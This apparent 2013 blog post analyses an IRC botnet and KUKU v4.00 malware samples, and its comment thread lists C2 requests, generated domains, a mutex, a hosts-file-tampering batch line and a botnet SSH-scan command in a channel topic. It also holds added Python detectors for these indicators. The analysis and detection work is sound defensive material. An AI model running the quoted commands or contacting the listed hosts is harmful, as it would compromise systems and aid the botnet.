were.hacked.jp (IRC botnet hosted in France, Roubaix, OVH Systems)

Thanks to the anonymous guy in this post for the sample.

Resolved : [were.hacked.jp] To []

Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channel topic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x
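The connection details above (the nick shape, the ###x00### channel, and commands parked in the channel topic) are exactly what a network sensor watching IRC traffic can key on. The following is an added example, not code from this post or from anyone connected to the botnet: a small Python parser for raw IRC lines that flags this bot's nick format, the triple-hash channel name, and dot-prefixed commands in a 332 (RPL_TOPIC) reply. The sample lines are constructed from the values in the post; the server name irc.example.invalid, the benign lines, and the rule that any dot-prefixed word in a topic counts as a bot command are assumptions made here.

```python
import re

# Constructed IRC lines (not a real capture) modelled on the connection details
# in the post: the nick shape, the ###x00### channel and commands in the topic.
# The server name irc.example.invalid and the benign lines are made up here.
SAMPLE_IRC_LINES = [
    "NICK {x00-00-DEU-XP-DELL-9640}",
    "USER __x00 0 * :__x00",
    "JOIN ###x00###",
    ":irc.example.invalid 332 {x00-00-DEU-XP-DELL-9640} ###x00### "
    ":.ban |.scan sshspreadscan 120 7 0 41.x.x.x",
    "NICK alice",
    "JOIN #linux",
    ":irc.example.invalid 332 alice #linux :Welcome to #linux, be nice",
]

# Nick shape from the post: {id-NN-COUNTRY-OS-HOST-NNNN}; the country code and
# the number of dash-separated fields are generalised from that one sample.
BOT_NICK_RE = re.compile(r"^\{[^}]*-[A-Z]{3}-[A-Za-z0-9]+-[A-Za-z0-9-]+\}$")
# Channel names wrapped in triple hashes, as ###x00### in the post.
BOT_CHANNEL_RE = re.compile(r"^#{3}\w+#{3}$")
# Assumption: any dot-prefixed word in a topic is a bot command (.ban, .scan);
# the lookbehind keeps dotted addresses like 41.x.x.x from matching.
TOPIC_CMD_RE = re.compile(r"(?<!\w)\.(\w+)")


def parse_irc_line(line):
    """Split a raw IRC line into (prefix, command, params) using RFC 1459 framing:
    optional ':prefix', a command, then parameters with an optional ' :trailing'."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    command, params = params[0], params[1:]
    return prefix, command, params


def find_irc_c2_indicators(lines):
    """Return (indicator, value) alerts for lines matching the botnet's features."""
    alerts = []
    for line in lines:
        _, cmd, params = parse_irc_line(line)
        if cmd == "NICK" and params and BOT_NICK_RE.match(params[0]):
            alerts.append(("bot_nick_format", params[0]))
        elif cmd == "JOIN" and params and BOT_CHANNEL_RE.match(params[0]):
            alerts.append(("triple_hash_channel", params[0]))
        elif cmd == "332" and len(params) >= 3:  # RPL_TOPIC: <nick> <channel> :<topic>
            cmds = TOPIC_CMD_RE.findall(params[2])
            if cmds:
                alerts.append(("topic_commands", ",".join(cmds)))
    return alerts


if __name__ == "__main__":
    for indicator, value in find_irc_c2_indicators(SAMPLE_IRC_LINES):
        print(f"{indicator}: {value}")
```

Run it as a script and it prints the three alerts for the constructed session and nothing for the benign lines. The topic rule is the one worth tuning on real traffic: legitimate channels do put dotted words in topics, so in practice it is paired with the nick or channel match rather than fired on its own.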

sample here

Hosting info:



Anonymous - May 6, 2013 at 9:26 pm

Here's the "anonymous guy" IP: , he's been DDoSed for a month.

Anonymous - May 7, 2013 at 4:31 am

Hello Pig, just wondering, where do you get your malware from?

Where do you search?

Pig - May 7, 2013 at 3:52 pm

1 month DDoS for a Panama IP? u must be raged to death lool

Anonymous - May 7, 2013 at 7:35 pm

The sample is deleted, can you upload it again?

Anonymous - May 8, 2013 at 3:19 am

Anonymous - May 8, 2013 at 12:32 pm



HTTP bot I think, communicates to random shitted domains.
Kinda advanced I think 😀

Anonymous - May 8, 2013 at 2:27 pm

Pig - May 8, 2013 at 4:26 pm

txx.exe connects here: hxxp://

POST /G@t3/1nPu7.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache

xdf8$&xf2s~ixb3cxb3xf5!x16a(Z kx1d(, Rxe6x85 xdexc3x1bx7fxddxf4x0exc9Kx1f'xed)WxcePx8675Gxa7x04jx7fxe2x8c*B4xddJx1fx87x0fGx85xaf6xa7Y;xd5xd2x184xb1xb7_,pxcaesxb3Hxcfxeexff=x035x8d*x9axc8xd8xaaf|Hxfdx99xabw5x14Qx01xb3xecxf8xf6xa3&xcdxdcxfb

Download URLs
hxxp:// (they're not active now)
Outgoing connection to remote server: TCP port 3128

Pig - May 8, 2013 at 4:35 pm

helpxx.exe is an SFX archive with 2 files inside: host.bat and winhelp.exe

host.bat: echo inf0nix.com >> %Systemroot%\system32\drivers\etc\hosts
winhelp.exe: connects to hxxp://inf0nix.com/notify.php

Pig - May 8, 2013 at 4:55 pm

This is the domain name for fU1.exe: files.g00n.pl. The rest are random domain names created by the malware, like this: http://www.bpfq02.com/www.inform1ongung.info

The HTTP query is this: files.g00n.pl/dev/ip.php
This is the mutex name for this malware: _kuku_joker_v4.00

Pig - May 8, 2013 at 5:05 pm

fsvchost.exe does this:
Copies self to other locations
Creates files in Windows system directory
Creates system services or drivers
Loads system drivers

Mutex created, still the same: _kuku_joker_v4.00

HTTP queries:
inf1nix.com GET /notify.php HTTP/1.1
http://www.bpfq02.com GET /t_100_v400/?rnd=247500&id=23104616288 HTTP/1.1
http://www.inform1ongung.info GET /t_100_v400/?rnd=252937&id=23104616288 HTTP/1.1

This is the malware version: User-Agent: KUKU v4.00 alpha

Malware disables safe boot.

New domain name here: inf1nix.com
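Pig's comments above give two things a defender can check for directly: the hosts-file line that helpxx.exe's host.bat appends, and the KUKU v4.00 network indicators (the /G@t3/1nPu7.php POST, the /t_100_v400/?rnd=...&id=... queries, the "KUKU v4.00 alpha" User-Agent, and the domains). The following is an added example in Python, not code from the post: it matches constructed proxy-log lines against those indicators and flags hosts-file lines that are not "address hostname" pairs, which is what `echo domain >> hosts` leaves behind. The log line format, the client and proxy addresses, and the hosts-file contents are constructed for the example; the indicator values are the ones quoted in the comments, and the path pattern generalises /t_100_v400/ to any /t_N_vN/ query.

```python
import ipaddress
import re

# Constructed proxy-log lines (not real captures): the indicators quoted in
# Pig's comments mixed with benign traffic. Format is made up for this example:
#   <client> <method> <host[:port]> <path> "<user-agent>"
SAMPLE_HTTP_LOG = [
    '10.0.0.5 POST 198.51.100.7:3128 /G@t3/1nPu7.php "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"',
    '10.0.0.5 GET inf1nix.com /notify.php "KUKU v4.00 alpha"',
    '10.0.0.6 GET www.bpfq02.com /t_100_v400/?rnd=247500&id=23104616288 "KUKU v4.00 alpha"',
    '10.0.0.7 GET www.example.org /index.html "Mozilla/5.0"',
    '10.0.0.8 GET files.g00n.pl /dev/ip.php "Mozilla/4.0"',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$'
)

# Indicator values come from the comments above; the labels are chosen here.
KUKU_DOMAINS = {
    "inf0nix.com", "inf1nix.com", "files.g00n.pl",
    "www.bpfq02.com", "www.inform1ongung.info",
}
KUKU_USER_AGENT = "KUKU v4.00 alpha"
# /t_100_v400/?rnd=...&id=... is generalised to /t_<n>_v<n>/?rnd=<n>&id=<n>;
# the other three paths are matched literally.
KUKU_PATH_RE = re.compile(
    r"^(?:/t_\d+_v\d+/\?rnd=\d+&id=\d+|/G@t3/1nPu7\.php|/notify\.php|/dev/ip\.php)$"
)


def match_kuku_http(log_lines):
    """Return (client, [reasons]) for every log line hitting at least one indicator."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        reasons = []
        if m["host"].split(":")[0] in KUKU_DOMAINS:
            reasons.append("domain")
        if KUKU_PATH_RE.match(m["path"]):
            reasons.append("uri")
        if m["ua"] == KUKU_USER_AGENT:
            reasons.append("user-agent")
        if reasons:
            hits.append((m["src"], reasons))
    return hits


# Constructed hosts file: a stock Windows header plus the line host.bat appends.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
inf0nix.com
"""


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def find_tampered_hosts_lines(hosts_text):
    """Flag hosts-file lines that are not '<address> <hostname>...' pairs, which is
    what 'echo domain >> hosts' leaves behind, and lines mapping a watched domain."""
    findings = []
    for lineno, raw in enumerate(hosts_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        if not names or not _is_ip(addr):
            findings.append((lineno, "malformed", line))
        elif KUKU_DOMAINS.intersection(names):
            findings.append((lineno, "watched-domain", line))
    return findings


if __name__ == "__main__":
    for client, reasons in match_kuku_http(SAMPLE_HTTP_LOG):
        print(f"{client}: {', '.join(reasons)}")
    for lineno, kind, text in find_tampered_hosts_lines(SAMPLE_HOSTS):
        print(f"hosts line {lineno} ({kind}): {text}")
```

Of the three HTTP checks, the User-Agent is the weakest on its own (trivial for a later build to change) and the domain list is the most perishable, since the comments say the malware generates new names; the /t_N_vN/?rnd=N&id=N shape is the one that survives both, which is why the function reports every reason that fired rather than a single verdict.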

Pig - May 8, 2013 at 5:09 pm

svchost-x.exe is the same shit as txx.exe

Pig - May 8, 2013 at 5:09 pm

Thank you for your submissions 🙂

Anonymous - May 8, 2013 at 5:29 pm

what is this bot btw?

Anonymous - May 8, 2013 at 6:51 pm
